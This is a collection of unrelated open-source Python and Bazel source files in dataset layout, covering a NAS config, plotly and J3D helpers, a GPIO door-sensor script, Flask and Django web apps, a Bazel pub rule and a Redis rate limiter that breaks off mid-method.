test_send_pipe = exp_name + '-test-send_pipe'
test_recv_pipe = exp_name + '-test-recv_pipe'
net_cache = 'model_and_data/checkpoint_epoch_50.pth.tar'
initial_net_cache = 'model_and_data/checkpoint_epoch_0.pth.tar'
layers = 14
edges = 14
model_input_size = (1, 3, 224, 224)
# Candidate operators
blocks_keys = [
'none',
'max_pool_3x3',
'avg_pool_3x3',
'skip_connect',
'sep_conv_3x3',
'sep_conv_5x5',
'dil_conv_3x3',
'dil_conv_5x5'
]
op_num = len(blocks_keys)
# Operators encoding
NONE = 0
MAX_POOLING_3x3 = 1
AVG_POOL_3x3 = 2
SKIP_CONNECT = 3
SEP_CONV_3x3 = 4
SEP_CONV_5x5 = 5
DIL_CONV_3x3 = 6
DIL_CONV_5x5 = 7
time_limit=None
#time_limit=0.050
speed_input_shape=[32,3,224,224]
flops_limit=True
max_flops=600*1e6
# max_flops=None
max_epochs=20
select_num = 10
population_num = 50
mutation_num = 25
m_prob = 0.1
crossover_num = 25
momentum = 0.7
eps = 1e-5
# Enumerate all paths of a single cell
paths = [[0, 2, 3, 4, 5], [0, 2, 3, 5], [0, 2, 4, 5], [0, 2, 5], [0, 3, 4, 5], [0, 3, 5], [0, 4, 5], [0, 5],
[1, 2, 3, 4, 5], [1, 2, 3, 5], [1, 2, 4, 5], [1, 2, 5], [1, 3, 4, 5], [1, 3, 5], [1, 4, 5], [1, 5],
[0, 2, 3, 4], [0, 2, 4], [0, 3, 4], [0, 4],
[1, 2, 3, 4], [1, 2, 4], [1, 3, 4], [1, 4],
[0, 2, 3], [0, 3],
[1, 2, 3], [1, 3],
[0, 2],
[1, 2]]
for i in ['exp_name']:
print('{}: {}'.format(i,eval('config.{}'.format(i))))
| 1.5625 | 2 |
packages/python/plotly/plotly/graph_objs/layout/geo/_projection.py | eranws/plotly.py | 0 | 11066 | <reponame>eranws/plotly.py<filename>packages/python/plotly/plotly/graph_objs/layout/geo/_projection.py<gh_stars>0
from plotly.basedatatypes import BaseLayoutHierarchyType as _BaseLayoutHierarchyType
import copy as _copy
class Projection(_BaseLayoutHierarchyType):
# class properties
# --------------------
_parent_path_str = "layout.geo"
_path_str = "layout.geo.projection"
_valid_props = {"parallels", "rotation", "scale", "type"}
# parallels
# ---------
@property
def parallels(self):
"""
For conic projection types only. Sets the parallels (tangent,
secant) where the cone intersects the sphere.
The 'parallels' property is an info array that may be specified as:
* a list or tuple of 2 elements where:
(0) The 'parallels[0]' property is a number and may be specified as:
- An int or float
(1) The 'parallels[1]' property is a number and may be specified as:
- An int or float
Returns
-------
list
"""
return self["parallels"]
@parallels.setter
def parallels(self, val):
self["parallels"] = val
# rotation
# --------
@property
def rotation(self):
"""
The 'rotation' property is an instance of Rotation
that may be specified as:
- An instance of :class:`plotly.graph_objs.layout.geo.projection.Rotation`
- A dict of string/value properties that will be passed
to the Rotation constructor
Supported dict properties:
lat
Rotates the map along meridians (in degrees
North).
lon
Rotates the map along parallels (in degrees
East). Defaults to the center of the
`lonaxis.range` values.
roll
Roll the map (in degrees) For example, a roll
of 180 makes the map appear upside down.
Returns
-------
plotly.graph_objs.layout.geo.projection.Rotation
"""
return self["rotation"]
@rotation.setter
def rotation(self, val):
self["rotation"] = val
# scale
# -----
@property
def scale(self):
"""
Zooms in or out on the map view. A scale of 1 corresponds to
the largest zoom level that fits the map's lon and lat ranges.
The 'scale' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["scale"]
@scale.setter
def scale(self, val):
self["scale"] = val
# type
# ----
@property
def type(self):
"""
Sets the projection type.
The 'type' property is an enumeration that may be specified as:
- One of the following enumeration values:
['equirectangular', 'mercator', 'orthographic', 'natural
earth', 'kavrayskiy7', 'miller', 'robinson', 'eckert4',
'azimuthal equal area', 'azimuthal equidistant', 'conic
equal area', 'conic conformal', 'conic equidistant',
'gnomonic', 'stereographic', 'mollweide', 'hammer',
'transverse mercator', 'albers usa', 'winkel tripel',
'aitoff', 'sinusoidal']
Returns
-------
Any
"""
return self["type"]
@type.setter
def type(self, val):
self["type"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
parallels
For conic projection types only. Sets the parallels
(tangent, secant) where the cone intersects the sphere.
rotation
:class:`plotly.graph_objects.layout.geo.projection.Rota
tion` instance or dict with compatible properties
scale
Zooms in or out on the map view. A scale of 1
corresponds to the largest zoom level that fits the
map's lon and lat ranges.
type
Sets the projection type.
"""
def __init__(
self, arg=None, parallels=None, rotation=None, scale=None, type=None, **kwargs
):
"""
Construct a new Projection object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.layout.geo.Projection`
parallels
For conic projection types only. Sets the parallels
(tangent, secant) where the cone intersects the sphere.
rotation
:class:`plotly.graph_objects.layout.geo.projection.Rota
tion` instance or dict with compatible properties
scale
Zooms in or out on the map view. A scale of 1
corresponds to the largest zoom level that fits the
map's lon and lat ranges.
type
Sets the projection type.
Returns
-------
Projection
"""
super(Projection, self).__init__("projection")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.layout.geo.Projection
constructor must be a dict or
an instance of :class:`plotly.graph_objs.layout.geo.Projection`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("parallels", None)
_v = parallels if parallels is not None else _v
if _v is not None:
self["parallels"] = _v
_v = arg.pop("rotation", None)
_v = rotation if rotation is not None else _v
if _v is not None:
self["rotation"] = _v
_v = arg.pop("scale", None)
_v = scale if scale is not None else _v
if _v is not None:
self["scale"] = _v
_v = arg.pop("type", None)
_v = type if type is not None else _v
if _v is not None:
self["type"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
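
# Illustrative usage (a sketch, not part of the generated class above); the
# concrete numbers are arbitrary examples chosen to match the property
# docstrings, not defaults:
#
#     proj = Projection(type="orthographic", scale=1.2,
#                       rotation=dict(lon=10, lat=45, roll=0))
#     proj.parallels = (30, 60)   # only meaningful for conic projection types
#     proj.to_plotly_json()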
| 2.828125 | 3 |
j3d/string_table.py | blank63/j3dview | 13 | 11067 | from btypes.big_endian import *
cstring_sjis = CString('shift-jis')
class Header(Struct):
string_count = uint16
__padding__ = Padding(2)
class Entry(Struct):
string_hash = uint16
string_offset = uint16
def unsigned_to_signed_byte(b):
return b - 0x100 if b & 0x80 else b
def calculate_hash(string):
h = 0
for b in string:
h = (h*3 + unsigned_to_signed_byte(b)) & 0xFFFF
return h
def pack(stream, strings):
strings = [string.encode('shift-jis') for string in strings]
header = Header()
header.string_count = len(strings)
Header.pack(stream, header)
offset = Header.sizeof() + Entry.sizeof()*len(strings)
for string in strings:
entry = Entry()
entry.string_hash = calculate_hash(string)
entry.string_offset = offset
Entry.pack(stream, entry)
offset += len(string) + 1
for string in strings:
stream.write(string)
stream.write(b'\0')
def unpack(stream):
base = stream.tell()
header = Header.unpack(stream)
entries = [Entry.unpack(stream) for _ in range(header.string_count)]
strings = []
for entry in entries:
stream.seek(base + entry.string_offset)
strings.append(cstring_sjis.unpack(stream))
return strings
| 2.6875 | 3 |
deConzSensors.py | peterstadler/deConzSensors | 0 | 11068 | #!/usr/bin/env python3.5
from time import sleep, time
from datetime import datetime, timedelta
from pid.decorator import pidfile
#from subprocess import call
from RPi import GPIO
import requests
import json
#import config
import logging
import signal
import sys
#13: green
#16: brown
#19: orange
#20: green
#21: brown
#26: orange
SENSORS = [
{
"GPIOpinIN": 26,
"GPIOpinOUT": 19,
"SENSORID": 4,
"NAME": "Garagentor"
},
{
"GPIOpinIN": 20,
"GPIOpinOUT": 13,
"SENSORID": 2,
"NAME": "Garagentür"
}
]
# deConz REST API settings
APIKEY = "" # API key for the deConz REST API
APIHOST = "" # IP address of the deConz REST API, e.g. "192.168.1.100"
APISCHEME = "http" # scheme for the deConz REST API, e.g. "http"
# program settings
POLL_INTERVALL = 7 # duration in seconds to wait between polls
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s', filename='/var/log/deConzSensors.log')
class mySensor:
def ping(self):
GPIO.output(self.gpio_out, 1)
sumOfStates = 0
for i in range(10): # get 10 samples of the door state
curState = GPIO.input(self.gpio_in)
logging.debug('current state of ' + self.name + ': ' + str(curState))
sumOfStates += curState
sleep(0.1)
GPIO.output(self.gpio_out, 0)
if sumOfStates < 5:
if self.door_open == False:
logging.info(self.name + ' opened')
self.door_open = True
setRemoteSensor(True, self.sensor_id)
else:
if self.door_open == True:
logging.info(self.name + ' closed')
setRemoteSensor(False, self.sensor_id)
self.door_open = False
#delta = (datetime.now() - self.open_since).seconds # delta in seconds between now and the door open state
#logging.debug(self.name + ': delta: ' + str(delta) + ' – GPIO input ' + str(self.gpio_in))
#if self.door_open and (delta > (2 * POLL_INTERVALL)): # only set remote sensor when we have 2 consecutive misses
# logging.warning(self.name + ' open')
# setRemoteSensor(True, self.sensor_id)
#self.door_open = True
#def updateLocalSettings(self, channel):
# logging.debug(self.name + ': Callback fired for GPIO input ' + str(channel))
# self.door_open = False
# self.open_since = datetime.now()
def __init__(self, sensor_config):
self.door_open = True
self.open_since = datetime.now()
self.gpio_in = sensor_config["GPIOpinIN"]
self.gpio_out = sensor_config["GPIOpinOUT"]
self.sensor_id = sensor_config["SENSORID"]
self.name = sensor_config["NAME"]
GPIO.setup(sensor_config["GPIOpinIN"], GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(sensor_config["GPIOpinOUT"], GPIO.OUT, initial=GPIO.LOW)
#GPIO.add_event_detect(sensor_config["GPIOpinIN"], GPIO.RISING, callback=self.updateLocalSettings, bouncetime=250)
def terminate(signum, frame):
logging.info("******************** Terminating ******************** ")
logging.debug('Signal handler called with signal ' + str(signum))
GPIO.cleanup()
logging.info("************************ Exit *********************** ")
sys.exit(0)
def init():
logging.info("******************** Starting up ******************** ")
signal.signal(signal.SIGINT, terminate)
signal.signal(signal.SIGTERM, terminate)
GPIO.setmode(GPIO.BCM)
mySensors = []
for sensor in SENSORS:
logging.info("adding sensor '" + sensor["NAME"] + "' at GPIO pin " + str(sensor["GPIOpinIN"]))
mySensors.append(mySensor(sensor))
logging.info("***************************************************** ")
return mySensors
def setRemoteSensor(open, sensor_id):
url = APISCHEME + "://" + APIHOST + "/api/" + APIKEY + "/sensors/" + str(sensor_id) + "/state"
payload = {'open': str(open).lower()}
r = requests.put(url, data=json.dumps(payload))
r.raise_for_status()
logging.debug('setting remote sensor ' + str(sensor_id) + ' to ' + str(open))
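
# For example, setRemoteSensor(True, 4) issues
#     PUT http://<APIHOST>/api/<APIKEY>/sensors/4/state
# with JSON body {"open": "true"}; APIHOST and APIKEY come from the (here empty)
# settings above, and the sensor ids come from the SENSORS list.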
# creating a PID file to prevent double execution of this script
@pidfile()
def main():
sensors=init() # initialize everything
while True: # idle loop
for sensor in sensors:
sensor.ping()
sleep(POLL_INTERVALL / len(sensors)) # sleep for the duration given as POLL_INTERVALL
if __name__ == '__main__':
main()
| 2.484375 | 2 |
src/admin.py | kappa243/agh-db-proj | 0 | 11069 | <filename>src/admin.py
from flask import Blueprint, request, render_template, flash, redirect, url_for
from flask_login import login_user, login_required, current_user, logout_user
from models import User
from werkzeug.security import generate_password_hash, check_password_hash
from app import db, login_manager
admin = Blueprint('admin', __name__)
@admin.route('/admin', methods=['POST', 'GET'])
@login_required
def admin_panel():
if current_user.is_authenticated:
user = User.query.get(int(current_user.get_id()))
if not user.admin:
return redirect(url_for('index'))
users = User.query.order_by(User.id).all()
if request.method == 'POST':
if 'edit_user' in request.form:
old_username = request.form['edit_user']
user = db.session.query(User).filter_by(username=old_username).with_for_update().first()
username = request.form['username']
password = request.form['password']
if len(username) > 0:
user.username = username
if len(password) > 0:
if len(password) >= 3:
user.password = generate_password_hash(password, method='<PASSWORD>')
else:
flash('Password must be minimum 3 characters long')
if 'grant_admin' in request.form:
user.admin = True
if 'remove_admin' in request.form:
user.admin = False
if 'delete' in request.form:
old_username = request.form['delete']
User.query.filter_by(username=old_username).with_for_update().delete()
db.session.commit()
return redirect(url_for('admin.admin_panel'))
return render_template('admin_panel.html', users=users)
| 2.40625 | 2 |
test/lib/test_map.py | oldmantaiter/inferno | 1 | 11070 | import datetime
import types
from nose.tools import eq_
from nose.tools import ok_
from inferno.lib.map import keyset_map
from inferno.lib.rule import InfernoRule
class TestKeysetMap(object):
def setUp(self):
self.data = {
'city': 'toronto',
'country': 'canada',
'population': 100,
'size': 1000,
            'date': datetime.date(2012, 12, 1)}
self.rule = InfernoRule(
key_parts=['country', 'city'],
value_parts=['population', 'size'])
def test_keys_and_parts(self):
expected = [('["_default","canada","toronto"]', [100, 1000])]
self._assert_map(self.data, self.rule, expected)
def test_missing_key_part_should_not_yield_result(self):
del self.data['city']
expected = []
self._assert_map(self.data, self.rule, expected)
def test_missing_value_part_should_yield_result(self):
del self.data['size']
expected = [('["_default","canada","toronto"]', [100, 0])]
self._assert_map(self.data, self.rule, expected)
def test_null_key_part_should_not_yield_result(self):
self.data['city'] = None
expected = []
self._assert_map(self.data, self.rule, expected)
def test_null_value_part_should_yield_result(self):
self.data['size'] = None
expected = [('["_default","canada","toronto"]', [100, None])]
self._assert_map(self.data, self.rule, expected)
def test_empty_key_part_should_yield_result(self):
self.data['city'] = ''
expected = [('["_default","canada",""]', [100, 1000])]
self._assert_map(self.data, self.rule, expected)
def test_empty_value_part_should_yield_result(self):
self.data['size'] = ''
expected = [('["_default","canada","toronto"]', [100, ''])]
self._assert_map(self.data, self.rule, expected)
def test_map_serialization(self):
# key parts are str casted & json serialized, value parts are are not
# (note the difference between the key date and value date results)
rule = InfernoRule(
key_parts=['date'],
value_parts=['date'])
expected = [('["_default","2012-12-01"]', [datetime.date(2012, 12, 1)])]
self._assert_map(self.data, rule, expected)
def test_field_transforms(self):
def upper(val):
return val.upper()
rule = InfernoRule(
key_parts=['country', 'city'],
value_parts=['population', 'size'],
field_transforms={'city': upper, 'country': upper})
expected = [('["_default","CANADA","TORONTO"]', [100, 1000])]
self._assert_map(self.data, rule, expected)
def test_parts_preprocess_that_yields_multiple_parts(self):
def lookup_language(parts, params):
for language in ['french', 'english']:
parts_copy = parts.copy()
parts_copy['language'] = language
yield parts_copy
rule = InfernoRule(
key_parts=['country'],
value_parts=['language'],
parts_preprocess=[lookup_language])
expected = [
('["_default","canada"]', ['french']),
('["_default","canada"]', ['english'])]
self._assert_map(self.data, rule, expected)
def test_field_transforms_happen_after_parts_preprocess(self):
def lookup_language(parts, params):
for language in ['french', 'english']:
parts_copy = parts.copy()
parts_copy['language'] = language
yield parts_copy
def upper(val):
return val.upper()
rule = InfernoRule(
key_parts=['country'],
value_parts=['language'],
parts_preprocess=[lookup_language],
field_transforms={'language': upper})
expected = [
('["_default","canada"]', ['FRENCH']),
('["_default","canada"]', ['ENGLISH'])]
self._assert_map(self.data, rule, expected)
def _assert_map(self, parts, rule, expected):
# turn disco_debug on for more code coverage
rule.params.disco_debug = True
actual = keyset_map(parts, rule.params)
ok_(isinstance(actual, types.GeneratorType))
eq_(list(actual), expected)
| 2.4375 | 2 |
dart/build_rules/internal/pub.bzl | nickclmb/rules_dart | 0 | 11071 | <reponame>nickclmb/rules_dart
# Copyright 2016 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
_pub_uri = "https://storage.googleapis.com/pub.dartlang.org/packages"
"""A set of BUILD rules that facilitate using or building on "pub"."""
def _pub_repository_impl(repository_ctx):
package = repository_ctx.attr.package
version = repository_ctx.attr.version
repository_ctx.download_and_extract(
"%s/%s-%s.tar.gz" % (_pub_uri, package, version),
repository_ctx.attr.output,
)
pub_deps = repository_ctx.attr.pub_deps
bazel_deps = ["\"@vendor_%s//:%s\"" % (dep, dep) for dep in pub_deps]
deps = ",\n".join(bazel_deps)
repository_ctx.file(
"%s/BUILD" % (repository_ctx.attr.output),
"""
load("@io_bazel_rules_dart//dart/build_rules:core.bzl", "dart_library")
package(default_visibility = ["//visibility:public"])
filegroup(name = "LICENSE_FILES", srcs=["LICENSE"])
dart_library(
name = "%s",
srcs = glob(["lib/**"]),
license_files = ["LICENSE"],
pub_pkg_name = "%s",
deps = [
%s
],
)
""" % (package, package, deps),
)
pub_repository = repository_rule(
attrs = {
"output": attr.string(),
"package": attr.string(mandatory = True),
"version": attr.string(mandatory = True),
"pub_deps": attr.string_list(default = []),
},
implementation = _pub_repository_impl,
)
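
# Illustrative WORKSPACE usage (a sketch, not part of this file). The load
# label is inferred from this file's path, and the package name, version and
# empty dependency list are made-up examples:
#
#     load("@io_bazel_rules_dart//dart/build_rules/internal:pub.bzl", "pub_repository")
#
#     pub_repository(
#         name = "vendor_args",
#         output = ".",
#         package = "args",
#         version = "1.5.2",
#         pub_deps = [],
#     )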
| 1.6875 | 2 |
auror_core/__init__.py | millengustavo/auror-core | 11 | 11072 | <reponame>millengustavo/auror-core<gh_stars>10-100
import copy
import os
class Project(object):
def __init__(self, folder, *jobtypes):
self.jobtypes = jobtypes
self.folder = folder
self.params = []
self.version = 1
def is_v2(self):
self.version = 2
return copy.deepcopy(self)
def is_v1(self):
self.version = 1
return copy.deepcopy(self)
def with_params(self, *paramtypes):
self.params = paramtypes
return copy.deepcopy(self)
def write(self):
for param in self.params:
param._add_items()
param._write(self.folder)
for jobtype in self.jobtypes:
jobtype._add_items()
jobtype._write(self.folder)
if self.version == 2:
project_path = os.path.join(self.folder, 'flow20.project')
with open(project_path, 'w') as project:
project.write('azkaban-flow-version: 2.0')
| 2.609375 | 3 |
app.py | Vaishnavid14/snakegame | 5 | 11073 | <reponame>Vaishnavid14/snakegame<filename>app.py
'''
Purpose: Server responsible for routing
Author: Md. <NAME>
Command to execute: python app.py
'''
from flask import Flask
from flask import render_template
from flask import json
from flask import request
import random
import sys
app = Flask(__name__)
print("Server is live...", file = sys.stderr)
users = []
@app.route("/")
def index():
return render_template("index.html"), 200
@app.route("/generate", methods = ["POST"])
def generate():
this_user = {} # init user
send_data = {} # data to be sent
post_obj = request.json
rc = dimension(post_obj)
send_data["x"] = rc["x"]
send_data["y"] = rc["y"]
send_data["speed"] = 20
this_user["name"] = post_obj["name"] # sets the user's name
this_user["speed"] = send_data["speed"] # sets the user's speed
this_user["size"] = 0
users.append(this_user) # append it to the list of users
return json.dumps(send_data), 200
# sends the x and y coordinates to the client
@app.route("/regenerate", methods = ["POST"])
def regenerate():
send_data = {}
post_obj = request.json
rc = dimension(post_obj)
send_data["x"] = rc["x"]
send_data["y"] = rc["y"]
return json.dumps(send_data), 200
# updates the snake's size on the server and sends it back to the client
@app.route("/size", methods = ["POST"])
def size():
temp = {}
obj_obj = request.json
for i in range(len(users)):
if obj_obj["name"] == users[i]["name"]:
temp = users[i]
users[users.index(temp)]["size"] += 1
send_data = {}
send_data["size"] = users[users.index(temp)]["size"]
return json.dumps(send_data), 200
'''
Function: dimension
Purpose: generates random x and y coordinates within the client-supplied limits
in: obj
'''
def dimension(obj):
rc = {}
width_min = int(obj["width_min"])
width_max = int(obj["width_max"])
height_min = int(obj["height_min"])
height_max = int(obj["height_max"])
x = random_number(width_min, width_max)
y = random_number(height_min, height_max)
rc["x"] = x
rc["y"] = y
return rc
'''
Function: random_number
Purpose: generates a random integer within the given range [min, max]
in: min, max
'''
def random_number(min, max):
return random.randint(min, max)
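# A minimal sketch (not part of the original game) of the request shape the
# routes above expect; the field values below are illustrative assumptions.
def example_generate_request():
    # Exercise /generate with Flask's built-in test client
    payload = {
        "name": "player1",                   # stored in the users list
        "width_min": 0, "width_max": 580,    # board bounds (example values)
        "height_min": 0, "height_max": 380
    }
    with app.test_client() as client:
        return client.post("/generate", json=payload)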
if __name__ == "__main__":
app.run(host = "localhost", port = 2406, debug = True) | 2.9375 | 3 |
grafana_api/api/__init__.py | sedan07/grafana_api | 0 | 11074 | <filename>grafana_api/api/__init__.py
from .base import Base
from .admin import Admin
from .dashboard import Dashboard
from .datasource import Datasource
from .folder import Folder
from .organisation import Organisation, Organisations
from .search import Search
from .user import User, Users
| 1.070313 | 1 |
shop/views.py | Ayushman-Singh/ecommerce | 1 | 11075 | from shop.forms import UserForm
from django.views import generic
from django.urls import reverse_lazy
from django.shortcuts import render, redirect, get_object_or_404
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.models import auth
from .models import Product, Contact, Category, Product, Order, OrderItem
from django.contrib import messages
from django.views.decorators.csrf import ensure_csrf_cookie
from math import ceil
import json
from shop.models import User
from django.views.decorators.csrf import csrf_exempt
# from PayTm import checksum
# Create your views here.
from django.http import HttpResponse
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
MERCHANT_KEY = 'Your-Merchant-Key-Here'
def index(request, category_slug=None):
category = None
categories = Category.objects.all()
products = Product.objects.filter(available=True)
if category_slug:
category = get_object_or_404(Category, slug=category_slug)
products = products.filter(category=category)
page = request.GET.get('page')
paginator = Paginator(products, 6)
try:
products = paginator.page(page)
except PageNotAnInteger:
products = paginator.page(1)
except EmptyPage:
products = paginator.page(1)
if request.user:
print(request.user)
pass
# wishlist = Wishlist.objects.filter(user=request.user)
return render(
request,
'shop/index.html',
{
'category': category,
'categories': categories,
'products': products,
# 'wishlist': wishlist
}
)
else:
return render(
request,
'shop/index.html',
{
'category': category,
'categories': categories,
'products': products,
}
)
def searchMatch(query, item):
'''return true only if query matches the item'''
if query in item.description.lower() or query in item.name.lower():
return True
else:
return False
def search(request):
query = request.GET.get('search')
allProds = []
catprods = Product.objects.values('category', 'id')
cats = {item['category'] for item in catprods}
for cat in cats:
prodtemp = Product.objects.filter(category=cat)
prod = [item for item in prodtemp if searchMatch(query, item)]
n = len(prod)
nSlides = n // 4 + ceil((n / 4) - (n // 4))
if len(prod) != 0:
allProds.append([prod, range(1, nSlides), nSlides])
params = {
'products': allProds,
"msg": ""
}
if len(allProds) == 0 or len(query) < 4:
params = {
'msg': "Please make sure to enter relevant search query"
}
return render(request, 'shop/search.html', params)
def about(request):
return render(request, 'shop/about.html')
def contact(request):
thank = False
if request.method == "POST":
name = request.POST.get('name', '')
email = request.POST.get('email', '')
phone = request.POST.get('phone', '')
desc = request.POST.get('desc', '')
contact = Contact(name=name, email=email, phone=phone, desc=desc)
contact.save()
thank = True
return render(request, 'shop/contact.html', {'thank': thank})
def tracker(request):
if request.method == "POST":
orderId = request.POST.get('orderId', '')
email = request.POST.get('email', '')
try:
order = Order.objects.filter(order_id=orderId, email=email)
if len(order) > 0:
update = OrderUpdate.objects.filter(order_id=orderId)
updates = []
for item in update:
updates.append(
{
'text': item.update_desc,
'time': item.timestamp
}
)
response = json.dumps(
{
"status": "success",
"updates": updates,
"itemsJson": order[0].items_json
},
default=str
)
return HttpResponse(response)
else:
return HttpResponse('{"status":"noitem"}')
except Exception as e:
return HttpResponse('{"status":"error"}')
return render(request, 'shop/tracker.html')
def productView(request, myid):
# Fetch the product using the id
product = Product.objects.filter(id=myid)
return render(request, 'shop/prodView.html', {'product': product[0]})
def checkout(request):
if request.method == "POST":
items_json = request.POST.get('itemsJson', '')
name = request.POST.get('name', '')
amount = request.POST.get('amount', '')
email = request.POST.get('email', '')
address = request.POST.get('address1', '') + \
" " + request.POST.get('address2', '')
city = request.POST.get('city', '')
state = request.POST.get('state', '')
zip_code = request.POST.get('zip_code', '')
phone = request.POST.get('phone', '')
order = Order(
name=name, email=email,
address=address,
state=state,
# zip_code=zip_code,
# phone=phone,
# amount=amount
)
order.save()
order_item = OrderItem(
order=order,
price=amount,
product_id=1,
)
order_item.save()
thank = True
# id = order.order_id
return render(request, 'shop/checkout.html', {'thank':thank, 'id': order.id})
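        # NOTE: because of the return above, the Paytm request below is never
        # reached in this view.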
# Request paytm to transfer the amount to your account after payment by user
param_dict = {
'MID': 'Your-Merchant-Id-Here',
'ORDER_ID': str(order.order_id),
'TXN_AMOUNT': str(amount),
'CUST_ID': email,
'INDUSTRY_TYPE_ID': 'Retail',
'WEBSITE': 'WEBSTAGING',
'CHANNEL_ID': 'WEB',
'CALLBACK_URL': 'http://127.0.0.1:8000/handlerequest/',
}
# param_dict['CHECKSUMHASH'] = checksum.generate_checksum(param_dict, MERCHANT_KEY)
# return render(request, '/paytm.html', {'param_dict': param_dict})
return render(request, 'shop/checkout.html')
def signup(request):
if request.method == 'POST':
        print('post')
form = UserForm(request.POST)
if form.is_valid():
user = form.save(commit=False)
# commit=False tells Django that "Don't send this to database yet.
# I have more things I want to do with it."
# import pdb;pdb.set_trace()
if form.cleaned_data['type']=='Vendor':
user.is_staff = True # Set the user object here
user.save()
return redirect("/admin/login")
else:
user.is_staff = False
user.save()
return redirect("/login") # Now you can send it to DB
else:
            print('invalid post')
form = UserForm()
print(form.errors)
return render(
request,
'shop/signup.html',{
'form':form,
'errors':form.errors
})
else:
        print('signup page requested')
form = UserForm()
return render(
request,
'shop/signup.html',{
'form':form
})
@csrf_exempt
def handlerequest(request):
    # Paytm sends its POST callback request here
form = request.POST
response_dict = {}
for i in form.keys():
response_dict[i] = form[i]
if i == 'CHECKSUMHASH':
checksum = form[i]
# verify = Checksum.verify_checksum(response_dict, MERCHANT_KEY, checksum)
# if verify:
# if response_dict['RESPCODE'] == '01':
# print('order successful')
# else:
# print('order was not successful because' + response_dict['RESPMSG'])
return render(request, 'shop/paymentstatus.html', {'response': response_dict})
def vendor(request):
user =User.objects.get(id=request.user.id)
menu = {}
return render(request, 'shop/restprofile.html', {'user':user})
from django.views.generic.edit import UpdateView
class UserUpdate(UpdateView):
model = User
fields = ['name','email','first_name','last_name']
template_name_suffix = '_update_form' | 2.0625 | 2 |
SimMuon/GEMDigitizer/python/muonGEMDigi_cff.py | NTrevisani/cmssw | 3 | 11076 | import FWCore.ParameterSet.Config as cms
from SimMuon.GEMDigitizer.muonGEMDigis_cfi import *
from SimMuon.GEMDigitizer.muonGEMPadDigis_cfi import *
from SimMuon.GEMDigitizer.muonGEMPadDigiClusters_cfi import *
muonGEMDigiTask = cms.Task(simMuonGEMDigis, simMuonGEMPadDigis, simMuonGEMPadDigiClusters)
muonGEMDigi = cms.Sequence(muonGEMDigiTask)
| 1.09375 | 1 |
paas-ce/paas/esb/lib/redis_rate_limit/ratelimit.py | renmcc/bk-PaaS | 767 | 11077 | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available.
Copyright (C) 2017-2018 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
""" # noqa
"""A distributed rate limiter rely on redis
based on `token bucket <https://en.wikipedia.org/wiki/Token_bucket>` algorithm
Usage
~~~~~
.. code-block:: python
# Init a redis connection pool
import redis
redisdb = redis.Redis()
rate = RateLimiter(redisdb, identifier='ip=127.0.0.1 path=/get_user_info/')
# Allow 10 requests every 1 minute
# period also accepts seconds/minutes/hours/days as key
rate.add_rule(tokens=10, period={'minute': 1})
# You could add multiple rules for on limiter
# rate.add_rule(tokens=200, period={'hour': 1})
print rate.acquire()
# returns {'allowed': True, 'remaining_tokens': 9.0}
"""
import time
import logging
from redis import WatchError
logger = logging.getLogger('root')
class BaseRateLimiter(object):
def __init__(self, redisdb, identifier, namespace='', tokens=None, period=None):
"""Init a RateLimiter class
:param redisdb: a `redis.Redis` instance
:param str identifier: identifier for the limiter, such as an user_id etc.
:param str namespace: namespace for redis keys
        :param int tokens: maximum tokens for one time period
:param dict period: dict, time period, such as {'minutes': 10}
"""
self.redisdb = redisdb
self.identifier = identifier
self.namespace = namespace
self.rules = []
# Add rule
if tokens is not None and period:
self.add_rule(tokens, period)
self.prepare()
def prepare(self):
"""Prepare to work
"""
pass
def add_rule(self, tokens, period):
"""Add multiple rules for this limiter, see `__init__` for parameter details
"""
rule = Rule(tokens, Rule.period_to_seonds(period))
self.rules.append(rule)
def acquire(self, tokens=1):
"""Acquire for a single request
:param int tokens: tokens to consume for this request, default to 1
"""
if not self.rules:
return {'allowed': True, 'remaining_tokens': 0}
logger.debug('Start acquiring tokens by given rules, this operation may have several '
'communications with redis.')
rets = []
for rule in self.rules:
logger.debug('Acquiring by single rule, rule=%s tokens=%s', rule, tokens)
ret = self.acquire_by_single_rule(rule, tokens)
logger.debug('Acquiring finished, result=%s', ret)
if not ret['allowed']:
logger.debug('Acquiring denied by given rule, rule=%s.', rule)
return ret
rets.append(ret)
        logger.debug('Acquiring succeeded.')
return {
'allowed': True,
'remaining_tokens': min(x['remaining_tokens'] for x in rets)
}
class RateLimiter(BaseRateLimiter):
"""Rate limiter class
"""
def acquire_by_single_rule(self, rule, tokens=1):
"""Acquire an request quota from limiter
:param rule: `Rule` object
:param int tokens: tokens to be consumed, default 1
:returns: a dict of `allowed` and `remaining_tokens`
            - allowed: whether this request is allowed
- remaining_tokens: remaining_tokens for this rule's period
"""
